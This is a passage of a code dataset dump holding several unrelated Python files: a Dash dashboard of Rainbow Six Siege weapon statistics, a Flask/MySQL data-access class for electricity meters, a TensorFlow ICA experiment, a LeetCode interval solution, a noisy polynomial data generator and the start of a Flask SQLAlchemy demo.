\"GSG9-BANDIT\", \"value\": \"GSG9-BANDIT\"},\n {\"label\": \"GSG9-BLITZ\", \"value\": \"GSG9-BLITZ\"},\n {\"label\": \"GSG9-IQ\", \"value\": \"GSG9-IQ\"},\n {\"label\": \"GSG9-JAGER\", \"value\": \"GSG9-JAGER\"},\n {\"label\": \"JTF2-BUCK\", \"value\": \"JTF2-BUCK\"},\n {\"label\": \"JTF2-FROST\", \"value\": \"JTF2-FROST\"},\n {\"label\": \"NAVYSEAL-BLACKBEARD\", \"value\": \"NAVYSEAL-BLACKBEARD\"},\n {\"label\": \"NAVYSEAL-VALKYRIE\", \"value\": \"NAVYSEAL-VALKYRIE\"},\n {\"label\": \"SAS-MUTE\", \"value\": \"SAS-MUTE\"},\n {\"label\": \"SAS-SLEDGE\", \"value\": \"SAS-SLEDGE\"},\n {\"label\": \"SAS-SMOKE\", \"value\": \"SAS-SMOKE\"},\n {\"label\": \"SAS-THATCHER\", \"value\": \"SAS-THATCHER\"},\n {\"label\": \"SAT-ECHO\", \"value\": \"SAT-ECHO\"},\n {\"label\": \"SAT-HIBANA\", \"value\": \"SAT-HIBANA\"},\n {\"label\": \"SPETSNAZ-FUZE\", \"value\": \"SPETSNAZ-FUZE\"},\n {\"label\": \"SPETSNAZ-GLAZ\", \"value\": \"SPETSNAZ-GLAZ\"},\n {\"label\": \"SPETSNAZ-KAPKAN\", \"value\": \"SPETSNAZ-KAPKAN\"},\n {\"label\": \"SPETSNAZ-TACHANKA\", \"value\": \"SPETSNAZ-TACHANKA\"},\n {\"label\": \"SWAT-ASH\", \"value\": \"SWAT-ASH\"},\n {\"label\": \"SWAT-CASTLE\", \"value\": \"SWAT-CASTLE\"},\n {\"label\": \"SWAT-PULSE\", \"value\": \"SWAT-PULSE\"},\n {\"label\": \"SWAT-THERMITE\", \"value\": \"SWAT-THERMITE\"}\n ],\n multi=False,\n value='G.E.O.-JACKAL',\n clearable=False,\n )\n ], className='two columns', style={'margin-top': '10'})\n ], className='row'),\n html.Div([\n html.Div([\n html.H4('Primary & Secondary Weapon data Per Game', style={'padding-bottom': '26px', 'padding-top': '16px'}),\n dt.DataTable(\n id='datatable',\n columns=[{\"name\": i, \"id\": i} for i in ddff.columns],\n sort_action='native',\n style_header={'backgroundColor': 'rgb(230, 230, 230)', 'fontWeight': 'bold'}\n ),\n\n\n ], className=\"six columns\"),\n html.Div([\n dcc.Graph(id='delta_figure', figure={}),\n ], className=\"six columns\")\n ], className='row'),\n html.Div([\n html.Div([\n html.H4('Operator Capability', style={'margin-top': '-10px'}),\n html.P('5 is the maximum value for each dimension,'),\n html.P('which means the operator is the best at this ability for overall.'),\n dcc.Graph(id='ability_figure', figure={})\n ], className=\"six columns\"),\n html.Div([\n html.P('Win Delta:', style={'fontWeight': 'bold'}),\n html.P('Win Delta = (The Win rate of WeaponCombo) - (The Win rate of the Operator)'),\n html.P('If the numbers of Win Delta is greater than 0, You have higher probability than average to win this game by using this Weapon combos.'),\n html.P('Presence:', style={'fontWeight': 'bold'}),\n html.P('Presence = (The presence number of WeaponCombo) / (The Overall presence number of the Operator)'),\n html.P('Presence means the popularity of this WeaponCombos.'),\n html.P('Kill: (in Table)', style={'fontWeight': 'bold'}),\n html.P('Kill = (The total kill of the WeaponCombo) / (The number of picked times of the WeaponCombo)'),\n html.P('Kill means the average kills can get in each round when you pick the WeaponCombo.'),\n html.P('Dead: (in Table)', style={'fontWeight': 'bold'}),\n html.P('Dead = (The total Dead when pick WeaponCombo) / (The number of picked times of the WeaponCombo)'),\n html.P('Dead means the average dead times in each round when you pick the WeaponCombo.'),\n ], className=\"six columns\")\n ], className='row'),\n html.Hr(),\n\n], className='ten columns offset-by-one', style={'opacity': '0.955'})\n\n\n\n# callback and function for the dataTable\n@app.callback(\n Output('datatable', 'data'),\n 
[dash.dependencies.Input('platform_select', 'value'),\n dash.dependencies.Input('rank_select', 'value'),\n dash.dependencies.Input('map_select', 'value'),\n dash.dependencies.Input('operator_select', 'value')]\n)\ndef generate_table(platform_selected, rank_selected, map_selected, operator_selected):\n table_data = df.copy()\n if operator_selected != \"None\":\n table_data = table_data.loc[(table_data['operator'] == operator_selected)]\n if rank_selected != \"None\":\n table_data = table_data.loc[(table_data['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n table_data = table_data.loc[(table_data['mapname'] == map_selected)]\n if platform_selected != \"None\":\n table_data = table_data.loc[(table_data['platform'] == platform_selected)]\n\n factor = [(\"primaryweapon\"), (\"secondaryweapon\")]\n table_data = table_data.groupby(factor).sum()[[\"haswon\", \"count\", \"nbkills\", \"isdead\"]].apply(lambda x: x).reset_index()\n table_data['Kill'] = round(table_data['nbkills'] / table_data['count'], 3)\n table_data['Dead'] = round(table_data['isdead'] / table_data['count'], 3)\n table_data['Win Rate%'] = round((table_data['haswon'] / table_data['count'])*100, 3)\n table_data['Primary'] = table_data['primaryweapon']\n table_data['Secondary'] = table_data['secondaryweapon']\n\n tempNum = 0\n for each in table_data['count']:\n tempNum += each\n\n # print(tempNum)\n\n table_data['Presence Rate%'] = round((table_data['count'] / tempNum)*100, 3)\n factor7 = [(\"Primary\"), (\"Secondary\")]\n\n res = table_data.groupby(factor7).sum()[[\"Win Rate%\", \"Presence Rate%\", \"Kill\", \"Dead\"]].apply(lambda x: x).reset_index()\n\n rows = res.to_dict('records')\n # print(rows)\n return rows\n\n else:\n return\n\n\n# callback and function for the win Delta Chart\n@app.callback(\n Output(component_id='delta_figure', component_property='figure'),\n [Input(component_id='platform_select', component_property='value'),\n Input(component_id='rank_select', component_property='value'),\n Input(component_id='map_select', component_property='value'),\n Input(component_id='operator_select', component_property='value')]\n)\ndef generate_graph(platform_selected, rank_selected, map_selected, operator_selected):\n dff = df.copy()\n if operator_selected != \"None\":\n dff = dff.loc[(dff['operator'] == operator_selected)]\n if rank_selected != \"None\":\n dff = dff.loc[(dff['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n dff = dff.loc[(dff['mapname'] == map_selected)]\n if platform_selected != \"None\":\n dff = dff.loc[(dff['platform'] == platform_selected)]\n\n #dealing with data\n factor = [(\"primaryweapon\"), (\"secondaryweapon\")]\n wdf = dff.groupby(factor).sum()[[\"haswon\", \"count\"]].apply(lambda x: x).reset_index()\n wdf['winrate'] = wdf['haswon'] / wdf['count']\n factor2 = ['operator']\n avf = dff.groupby(factor2).sum()[[\"haswon\", \"count\"]].apply(lambda x: x).reset_index()\n avf['winrate'] = avf['haswon'] / avf['count']\n tempNum = avf['winrate'][0]\n wdf['winDelta'] = (wdf['winrate'] - tempNum)*100\n tempNum = avf['count'][0]\n wdf['presence'] = (wdf['count'] / tempNum)*100\n\n\n #generate graph\n fig = go.Figure()\n for index, row in wdf.iterrows():\n tempName = row['primaryweapon'] + ' & ' + row['secondaryweapon']\n fig.add_trace(go.Scatter(x=[row['presence']], y=[row['winDelta']], mode='markers', marker=dict(size=[20]),name=tempName))\n\n fig.update_layout(title='Weapon Influence about Win Rate',\n xaxis_title='Presence (in %)',\n yaxis_title='Win Delta(in %)',\n 
yaxis_zeroline=True,\n yaxis_zerolinecolor='red',\n )\n\n\n return fig\n else:\n\n fig = go.Figure()\n fig.update_layout(title='Weapon combo Influence about Win Rate',\n xaxis_title='Presence (in %)',\n yaxis_title='Win Delta(in %)')\n\n return fig\n\n@app.callback(\n Output(component_id='ability_figure', component_property='figure'),\n [Input(component_id='platform_select', component_property='value'),\n Input(component_id='rank_select', component_property='value'),\n Input(component_id='map_select', component_property='value'),\n Input(component_id='operator_select', component_property='value')]\n)\ndef generate_abgraph(platform_selected, rank_selected, map_selected, operator_selected):\n if operator_selected != \"None\":\n temp_df = df.copy()\n\n temp_df = temp_df[temp_df.operator != 'SWAT-RESERVE']\n temp_df = temp_df[temp_df.operator != 'GIGN-RESERVE']\n temp_df = temp_df[temp_df.operator != 'GSG9-RESERVE']\n temp_df = temp_df[temp_df.operator != 'SAS-RESERVE']\n temp_df = temp_df[temp_df.operator != 'SPETSNAZ-RESERVE']\n if rank_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['skillrank'] == rank_selected)]\n if map_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['mapname'] == map_selected)]\n if platform_selected != \"None\":\n temp_df = temp_df.loc[(temp_df['platform'] == platform_selected)]\n\n factor2 = [('operator'),('role')]\n temp_df = temp_df.groupby(factor2).sum()[[\"haswon\", \"count\", \"nbkills\", \"isdead\"]].apply(lambda x: x).reset_index()\n temp_df['Kill'] = temp_df['nbkills'] / temp_df['count']\n temp_df['Dead'] = temp_df['isdead'] / temp_df['count']\n temp_df['Win Rate'] = temp_df['haswon'] / temp_df['count']\n totalnum = 0\n for each in temp_df['count']:\n totalnum += each\n temp_df['Presence'] = (temp_df['count'] / totalnum)*500\n\n Att_df = temp_df.loc[(temp_df['role'] == 'Attacker')]\n Def_df = temp_df.loc[(temp_df['role'] == 'Defender')]\n cur_role = ''\n cur_df = Att_df\n\n for index, row in temp_df.iterrows():\n if row['operator'] == operator_selected:\n cur_role = row['role']\n\n if cur_role == 'Defender':\n cur_df = Def_df\n\n\n #Win Rate Rank\n winRank_df = cur_df.groupby('operator').sum()[['Win Rate']].apply(lambda x: x).reset_index()\n winRank_df = winRank_df.sort_values('Win Rate')\n #Kill Rank high to low\n killRank_df = cur_df.groupby('operator').sum()[['Kill']].apply(lambda x: x).reset_index()\n killRank_df = killRank_df.sort_values('Kill')\n #dead Rank\n deadRank_df = cur_df.groupby('operator').sum()[['Dead']].apply(lambda x: x).reset_index()\n deadRank_df = deadRank_df.sort_values('Dead', ascending=False)\n #Popularity Rank high to low\n popularity_df = cur_df.groupby('operator').sum()[['Presence']].apply(lambda x: x).reset_index()\n popularity_df = popularity_df.sort_values('Presence')\n\n #Calculate score for each element\n\n kill_rank = 0\n for index, row in killRank_df.iterrows():\n kill_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n dead_rank = 0\n for index, row in deadRank_df.iterrows():\n dead_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n win_rank = 0\n for index, row in winRank_df.iterrows():\n win_rank += 1\n if row['operator'] == operator_selected:\n break\n\n\n popularity_rank = 0\n for index, row in popularity_df.iterrows():\n popularity_rank += 1\n if row['operator'] == operator_selected:\n break\n\n #score\n kill_score = kill_rank/3\n dead_score = dead_rank/3\n win_score = win_rank/3\n popularity_score = popularity_rank/3\n # print(\"there is test for score: \\n\")\n # 
print(kill_score, dead_score,win_score,popularity_score)\n\n\n #generate graph\n\n\n test_df = pd.DataFrame(dict(\n r=[win_score, kill_score, popularity_score, dead_score],\n theta=['Win Rate', 'Kill', 'Popularity',\n 'Survive']))\n fig77 = px.line_polar(test_df, r='r', theta='theta', line_close=True)\n fig77.update_traces(fill='toself')\n fig77.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 5]\n )),\n showlegend=False\n )\n return fig77\n else:\n test_df = pd.DataFrame(dict(\n r=[0, 0, 0, 0],\n theta=['Win Rate', 'Kill', 'Popularity',\n 'Survive']))\n fig77 = px.line_polar(test_df, r='r', theta='theta', line_close=True)\n fig77.update_traces(fill='toself')\n fig77.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 5]\n )),\n showlegend=False\n )\n return fig77","sub_path":"pages/page3.py","file_name":"page3.py","file_ext":"py","file_size_in_byte":17698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
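# Added sketch (not part of the original page): the Win Delta and Presence
# formulas from the on-page help text above, computed on a toy frame.
import pandas as pd

toy = pd.DataFrame({'combo': ['A', 'A', 'B'], 'haswon': [1, 0, 1], 'count': [1, 1, 1]})
per_combo = toy.groupby('combo').sum()
overall_rate = toy['haswon'].sum() / toy['count'].sum()
# Win Delta = combo win rate minus overall win rate, in percent
per_combo['win_delta'] = (per_combo['haswon'] / per_combo['count'] - overall_rate) * 100
# Presence = share of rounds in which the combo was picked, in percent
per_combo['presence'] = per_combo['count'] / toy['count'].sum() * 100
print(per_combo)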
+{"seq_id":"358935861","text":"import pymysql\nimport sqlite3\nfrom flask import g\n\nclass Dao:\n\n def __init__(self):\n self.__SELECT_ALL = '''\n select electricity_meter_tb.serial_cd as serial_cd,\n modem_tb.modem_cd as modem_cd ,\n electricity_meter_tb.electricity_filename as electricity_filename, \n date_format(electricity_meter_tb.electricity_save_date, '%Y-%m-%d %H:%i:%s') as electricity_save_date \n from electricity_meter_tb \n left join modem_tb \n on modem_tb.serial_cd = electricity_meter_tb.serial_cd \n where electricity_meter_tb.del_flag = 0\n ORDER BY electricity_save_date DESC;\n '''\n\n self.__SELECT_ONE = '''\n select \n electricity_meter_tb.serial_cd as serial_cd, \n electricity_meter_tb.supply_type as supply_type, \n electricity_meter_tb.typename as typename, \n electricity_meter_tb.electricity_filename as electricity_filename, \n date_format(electricity_meter_tb.electricity_save_date, '%%Y-%%m-%%d %%H:%%i:%%s') as electricity_save_date, \n modem_tb.modem_cd as modem_cd, \n modem_tb.modem_filename as modem_filename,\n date_format(modem_tb.modem_save_date, '%%Y-%%m-%%d %%H:%%i:%%s') as modem_save_date \n from electricity_meter_tb \n left join modem_tb \n on modem_tb.serial_cd = electricity_meter_tb.serial_cd \n where electricity_meter_tb.del_flag = 0 \n and electricity_meter_tb.serial_cd = %s \n '''\n\n self.__SELECT_PRE_IMAGE = '''\n select \n electricity_preprocessing_tb.pre_filename as pre_filename\n from electricity_meter_tb \n join electricity_preprocessing_tb \n on electricity_preprocessing_tb.serial_cd = electricity_meter_tb.serial_cd\n where electricity_meter_tb.del_flag = 0\n and electricity_meter_tb.serial_cd = %s\n '''\n\n self.__SELECT_BY_SERIAL_CD = '''\n select serial_cd \n from electricity_meter_tb \n where serial_cd = %s\n '''\n # 데이터베이스 연결 메소드\n def connect(self):\n try :\n # 연결\n self.con = pymysql.connect(host='localhost',\n port=3306,\n user='flaskServer',\n passwd='20210420',\n db='electricitydb',\n charset='utf8')\n # 데이터베이스 사용 객체 생성\n self.cursor = self.con.cursor()\n except Exception as err:\n print('DBConnection Error : ', err)\n return False\n return True\n\n # 데이터베이스 연결 해제 메소드\n def close(self):\n self.con.close()\n\n # 전체 데이터 가져오기\n def select_all(self):\n # 데이터베이스 연결\n result = True\n li = []\n connect_result = self.connect()\n if not connect_result:\n return connect_result, li\n try:\n\n # sql 문 실행\n self.cursor.execute(self.__SELECT_ALL)\n data = self.cursor.fetchall()\n # 데이터를 저장할 list\n for temp in data:\n item = {}\n item['serial_cd'] = temp[0]\n item['modem_cd'] = temp[1]\n item['electricity_filename'] = temp[2]\n item['electricity_save_date'] = temp[3]\n li.append(item)\n\n\n except self.cursor.Error as err:\n # insert 실패시 False 반환\n result = False\n print('MySQL Error : ', err)\n self.close()\n return result, li\n\n # dict형태로 데이터를 받아서 삽입하는 메소드\n def select_one(self, serial_cd):\n print(\"server 들어옴\")\n result = True\n item = {}\n li = []\n connect_result = self.connect()\n if not connect_result:\n return connect_result, li\n try:\n\n self.cursor.execute(self.__SELECT_ONE, serial_cd)\n data = self.cursor.fetchone()\n print(\"상세데이터 출력 : \", data)\n item['serial_cd'] = data[0]\n item['supply_type'] = data[1]\n item['typename'] = data[2]\n item['electricity_filename'] = data[3]\n item['electricity_save_date'] = data[4]\n item['modem_cd'] = data[5]\n item['modem_filename'] = data[6]\n item['modem_save_date'] = data[7]\n\n self.cursor.execute(self.__SELECT_PRE_IMAGE, serial_cd)\n imageList = self.cursor.fetchall()\n\n images = []\n for temp 
in imageList:\n\n images.append(temp[0])\n item['pre_filenames'] = images\n li.append(item)\n except self.cursor.Error as err:\n # insert 실패시 False 반환\n result = False\n print('MySQL Error : ', err)\n self.close()\n return result, item\n\n # 계량기 정보 입력\n def insert_meter(self, meter):\n # 결과를 저장할 변수\n result = False\n self.connect()\n\n data = self.cursor.execute(self.__SELECT_BY_SERIAL_CD ,\n (meter['serial_cd']))\n print('data::', type(data), ' ', data)\n\n if data == 0:\n # data = self.cursor.fetchone()\n # itemid = 1\n # # 데이터가 존재하는 경우는 가장 큰 itemid+1\n # if data[0] != None:\n # itemid = int(data[0]) + 1\n try:\n\n self.cursor.execute('insert into electricity_meter_tb ' +\n '(serial_cd, supply_type, typename,' +\n ' electricity_filename, region_cd) ' +\n 'values(%s,%s,%s,%s,%s)',\n (meter['serial_cd'], meter['supply_type'], meter['typename'],\n meter['electricity_filename'], meter['region_cd']))\n # 성공여부 확인 rowcount는 영향받은 행의 개수\n if self.cursor.rowcount >= 1:\n result = True\n\n except Exception as e:\n print(e)\n result = False\n\n self.con.commit()\n self.close()\n\n return result\n\n # 바코드 정보 입력\n\n def insert_barcode(self, barcode):\n # 결과를 저장할 변수\n result = False\n self.connect()\n\n data = self.cursor.execute('select serial_cd from electricity_meter_tb where serial_cd = %s',\n (barcode['serial_cd']))\n print('data::', type(data), ' ', data)\n\n # self.cursor.execute('select max(itemid) from item')\n # data = self.cursor.fetchone()\n # itemid = 1\n # # 데이터가 존재하는 경우는 가장 큰 itemid+1\n # if data[0] != None:\n # itemid = int(data[0]) + 1\n print(\"DAO::\", barcode)\n if data == 1:\n try:\n\n self.cursor.execute('insert into modem_tb ' +\n '(modem_cd, serial_cd, modem_filename) ' +\n 'values(%s,%s,%s)',\n (barcode['modem_cd'], barcode['serial_cd'], barcode['modem_filename']))\n # 성공여부 확인 rowcount는 영향받은 행의 개수\n if self.cursor.rowcount >= 1:\n result = True\n\n except Exception as e:\n print(e)\n result = False\n\n self.con.commit()\n self.close()\n\n return result","sub_path":"server/ElectricityOCRServer/common/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"5770728","text":"import tensorflow as tf\nimport soundfile as sf\nimport numpy as np\nimport time\nfrom tensorflow.python.client import timeline\nimport cProfile\n\n#This version of infomax uses the logcosh to approximate differential entropy.\n#This does not work.\n\n#read data, the type of data is a 1-D np.ndarray\ndata1, fs1 = sf.read('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/a_sig1.wav')\ndata2, fs2 = sf.read('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/a_sig2.wav')\n\n#Windows reading path\n# data1, fs1 = sf.read('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\a_sig1.wav')\n# data2, fs2 = sf.read('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\a_sig2.wav')\n\n#this sets the random seed to a fixed number.\nnp.random.seed(10)\n\nn_sources = 2\nbatch_size = 100\n\n#randomly initialize the mixing matrix A\n#each entry is from uniform[0,1), \nA = np.random.rand(2,2)\n\n#the number of data points. Also the number of columns.\n#Ns = len(data1)\nNs = fs1 * 5 #self defined data length, 5 seconds of speech\ndata1 = data1[:Ns]\ndata2 = data2[:Ns]\n\n#stack the two data arrays together as the source signals\n#the shape of S is (2,Ns)\nS = np.array((data1,data2))\n\n#V is the observed signal mixture.\nV = np.dot(A,S)\n\n#Remove mean\n#To take the mean of each row, choose axis = 1\nmeanValue = np.mean(V, axis = 1)\n#This changes meanValue from 1d to 2d, now a column vector with size dimension*1\nmeanValue = np.reshape(meanValue,(len(meanValue),1))\n#This creates an array full of ones with the same length as the column number of V\noneArray = np.ones((1,Ns))\n#This creates a matrix full of mean values for each row\nmeanMatrix = np.dot(meanValue,oneArray)\n#This gives V zero mean\nV = V - meanMatrix\n\n#whitening\n#this computes the covariance matrix of V. Each row should be a variable and each column should be an observation.\ncovMatrix = np.cov(V)\n#this gets the svd form of the covMatrix.\nP,d,Qt = np.linalg.svd(covMatrix, full_matrices=False)\nQ = Qt.T\n#this gets the first L entries\nd = d[:n_sources]\nD = np.diag(d)\n#this gets the first L columns of singular (eigen) vectors\nE = P[:,:n_sources]\n#this computes the whitening matrix D^(-1/2)*E.T\nwhiteningMatrix = np.dot(np.linalg.inv(np.sqrt(D)),E.T)\n#whitened is the whitened signal matrix\nwhitened = np.dot(whiteningMatrix,V)\n\ndata = whitened\ndata = np.transpose(data)\nvar = np.var(data[0:1000,0])\nprint(var)\n\n#None means it can be any value\nx = tf.placeholder('float', [None, n_sources])\n\n\n#The two functions below are not necessary \n#This give s a random block of data with size num\ndef next_batch(num, data):\n\n #Return a total of `num` random samples and labels. \n\n idx = np.arange(0 , len(data)-num)\n np.random.shuffle(idx)\n idx = idx[0]\n #This gives num random columns of the data array\n data_shuffle = data[idx:idx+num,:]\n\n return np.asarray(data_shuffle)\n\n#This gives a fixed block of data from a given start index.\ndef next_fixed_batch(num, data, startIndex):\n\n data_batch = data[startIndex:startIndex+num,:] \n return np.asarray(data_batch)\n\n'''\n#total random columns of data with length num\ndef next_batch(num, data):\n \n #Return a total of `num` random samples and labels. 
\n \n idx = np.arange(0 , len(data[0]))\n np.random.shuffle(idx)\n idx = idx[:num]\n data_shuffle = data[:,idx]\n\n return np.asarray(data_shuffle)\n'''\n\n\n\ndef neural_network_model(data):\n output_layer = {'weights':tf.Variable(tf.random_normal([n_sources, n_sources])),\n 'biases':tf.Variable(tf.random_normal([n_sources]))}\n net = tf.nn.bias_add(tf.matmul(data,output_layer['weights']), output_layer['biases'])\n output = tf.sigmoid(net)\n \n return output, output_layer['weights'],output_layer['biases']\n\ndef calculate_cost(unmixed):\n #slice columns out of a 2d tensor\n Y1 = tf.slice(unmixed,[0,0],[batch_size,1])\n Y2 = tf.slice(unmixed,[0,1],[batch_size,1])\n m1,var1 = tf.nn.moments(Y1,axes=[0])\n m2,var2 = tf.nn.moments(Y2,axes=[0])\n costTotal = 0\n epsilon = 1e-8\n covariate = 0\n #Sums up the cost for all input vectors (2*1) in a batch\n for i in range(batch_size):\n #this accesses the ith element in a 1-d tensor\n y1 = Y1[i,0]\n y2 = Y2[i,0]\n costTotal += tf.log(0.5*(tf.exp(y1)+tf.exp(-y1))+epsilon)+tf.log(0.5*(tf.exp(y2)+tf.exp(-y2))+epsilon) \n covariate += y1*y2\n\n\n cosh = costTotal/batch_size\n covariate = covariate/batch_size\n #cost = -tf.square(cosh)+0.1*tf.abs(var1-1)+0.1*tf.abs(var2-1)+covariate\n cost = -tf.abs(cosh)+0.5*covariate+tf.abs(var1-var)+tf.abs(var2-var)\n return cost,covariate,var1,var2,cosh\n\n\ndef train_neural_network(x):\n information, W, Bias = neural_network_model(x)\n # OLD VERSION:\n #cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(prediction,y) )\n # NEW:\n #slice rows out of a 2d tensor\n # Y1 = tf.slice(information,[0,0],[batch_size,1])\n # Y2 = tf.slice(information,[0,1],[batch_size,1])\n # costTotal = 0\n # epsilon = 1e-8\n # #Sums up the cost for all input vectors (2*1) in a batch\n # for i in range(batch_size):\n # #this accesses the ith element in a 1-d tensor\n # y1 = Y1[i,0]\n # y2 = Y2[i,0]\n # #costTotal += -tf.log(tf.abs(tf.matrix_determinant(W+np.identity(2)*epsilon)*y1*(1-y1)*y2*(1-y2)))\n # #mat_deter = tf.matrix_determinant(W+tf.to_float(np.identity(2))*epsilon)\n # mat_deter = tf.matrix_determinant(W)\n # #costTotal += -tf.log(tf.abs(mat_deter)*y1*(1-y1)*y2*(1-y2)+epsilon)+0.01*tf.norm(W, ord='fro', axis=[0,1])\n # costTotal += -tf.log(tf.abs(mat_deter)*y1*(1-y1)*y2*(1-y2)+epsilon)+0.01*tf.norm(W, ord='fro', axis=[0,1])\n\n\n # cost = costTotal/batch_size\n cost,cov,var1,var2,cosh = calculate_cost(information)\n #Add learning rate 1e-5\n optimizer = tf.train.AdamOptimizer(1e-4).minimize(cost)\n #optimizer = tf.train.GradientDescentOptimizer(1e-5).minimize(cost)\n \n hm_epochs = 25\n\n #try to disable all the gpus\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n )\n\n with tf.Session(config=config) as sess:\n #with tf.Session() as sess:\n\n # run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n # run_metadata = tf.RunMetadata()\n\n sess.run(tf.global_variables_initializer())\n\n #this prints out the training variables in tensorflow\n tvars=tf.trainable_variables()\n myvars = sess.run(tvars)\n print(myvars)\n # sess.close()\n\n # OLD:\n #sess.run(tf.initialize_all_variables())\n # NEW:\n \n for epoch in range(hm_epochs):\n epoch_loss = 0\n step = 0\n for _ in range(int(Ns/batch_size)):\n #epoch_x= next_batch(batch_size,data)\n startIndex = step * batch_size\n # _, c, det = sess.run([optimizer, cost, mat_deter], feed_dict={x: epoch_x}, options=run_options, run_metadata=run_metadata)\n #_, c, det = sess.run([optimizer, cost, mat_deter], feed_dict={x: epoch_x})\n _, c, weights, V1, V2, Cov,Cosh = 
sess.run([optimizer, cost, W, var1, var2, cov,cosh], feed_dict={x: data[startIndex:startIndex+batch_size,:]})\n epoch_loss += c\n # The following prints the intermediate steps in each epoch\n step+=1\n # if step % 50 ==0:\n # print('Epoch', epoch, 'cost', c,'determinant',det)\n\n epoch_loss = epoch_loss/(int(Ns/batch_size))\n print('Epoch', epoch, 'completed out of',hm_epochs,'loss:',epoch_loss)\n print(weights)\n print(V1)\n print(V2)\n print(Cov)\n print(Cosh)\n\n #Y = sess.run(information, feed_dict={x: data}, options=run_options, run_metadata=run_metadata)\n Y = sess.run(information, feed_dict={x: data})\n\n #without adding back the mean\n sf.write('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/logcosh1.wav', Y[:,0], fs1)\n sf.write('/home/yanlong/Downloads/2017T1/Comp489/ICA/Data/logcosh2.wav', Y[:,1], fs1)\n \n #windows writing path\n # sf.write('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\logcosh1.wav', Y[:,0], fs1)\n # sf.write('E:\\\\Courses\\\\Comp489\\\\ICA\\\\ICAFast\\\\Data\\\\logcosh2.wav', Y[:,1], fs1)\n\n #Create the Timeline object, and write it to a json\n # tl = timeline.Timeline(run_metadata.step_stats)\n # ctf = tl.generate_chrome_trace_format()\n # with open('timeline.json', 'w') as f:\n # f.write(ctf)\n\n\n# time.clock() was removed in Python 3.8; perf_counter is the portable wall-clock timer\nstart_time = time.perf_counter()\n\n#train_neural_network(x)\ncProfile.run('train_neural_network(x)')\n\nprint(time.perf_counter() - start_time, \"seconds\")\n\n#weight matrix\n# [[ 0.60584104 -0.50052547]\n # [-0.90244889 0.37680322]]\n","sub_path":"Infomax2.py","file_name":"Infomax2.py","file_ext":"py","file_size_in_byte":8699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"478359051","text":"class Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n new = []\n \n for i in range(len(intervals)):\n if newInterval[1] < intervals[i][0]:\n new.append(newInterval)\n return new + intervals[i:]\n elif newInterval[0] > intervals[i][1]:\n new.append(intervals[i])\n else:\n newInterval = [min(newInterval[0], intervals[i][0]), max(newInterval[1], intervals[i][1])]\n \n new.append(newInterval)\n \n return new","sub_path":"insertInterval.py","file_name":"insertInterval.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"186304309","text":"import numpy as np\n\ndef bivariable_polinomial(coeficients, sample_size=100, x0=0, xmax=100, mu=0, sigma=1):\n\t\"\"\" \n\tReturns x, y numpy arrays in the form of\n\t\n\t[3, 4] --> ax + b --> 3x + 4\n\t[3, 4, 5] --> ax^2 + bx + c --> 3x^2 + 4x + 5\n\n\t\"\"\"\n\n\t# there has to be a better way than to use numbers from 0 to xmax divided by sample size\n\tx = np.linspace(x0, xmax, sample_size, endpoint=True)\n\terror = np.random.normal(mu, sigma, sample_size)\n\n\n\n\t#initialize y as a np array of size=sample_size\n\ty = error\n\t\n\t# here we get the list of coeficients and for each one we will do\n\t# coeficient[i]*x^degree\n\t# since the enumerate function does not go down, we can make degree as coef.len() - i - 1\n\n\tlength = len(coeficients)\n\tfor degree, coef in enumerate(coeficients):\n\t\tif length - degree > 1 :\n\t\t\ty += coef*np.power(x, (length - degree - 1))\n\t\telse:\n\t\t\ty+= coef\n\treturn x, y\t","sub_path":"data_generator/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"196972340","text":"from flask import Flask, redirect, url_for, render_template, session, request, g\nfrom models import *\nfrom exts import db, login_log\n\nimport config\n\napp = Flask(__name__)\napp.config.from_object(config)\ndb.init_app(app)\n\n# db.create_all() 直接用db = SQLAlchemy(app)可以这样使用;db.create_all()目的是通过model来创建表\n# model分离写到其他的地方,就需要手动添加上下文,否则会报错\n# No application found. Either work inside a view function or push an application context.\n# with app.app_context():\n# db.create_all()\n# db.create_all() 只会执行一次,当你修改来model属性时,它不会自动增加相关属性,需要用数据库迁移来实现更新model对应表的字段\n\n\n@app.route('/')\ndef hello_world():\n # print(url_for(\"my_list\"))\n # print(url_for('article', id=\"1234\"))\n # flask_sqlalchemy相关使用\n # 增\n # article1 = Article(title='测试数据', content='测试数据的内容')\n # db.session.add(article1)\n # db.session.commit()\n\n # 查\n # result = Article.query.filter(Article.title == '测试数据').first()\n # print(result.title)\n # print(result.content)\n\n # 改\n # article_result = Article.query.filter(Article.title == '测试数据').first()\n # article_result.title = '修改后的测试数据'\n # db.session.commit()\n\n # 删\n # article_result = Article.query.filter(Article.title == '修改后的测试数据').first()\n # db.session.delete(article_result)\n # db.session.commit()\n\n # 外键设置和使用\n # author = Author(username='周勇利')\n # db.session.add(author)\n # db.session.commit()\n #\n # article_res = Article(title='活着', content='活着才有机会做更多的事情', author_id=1)\n # article_result = Article(title='好好努力', 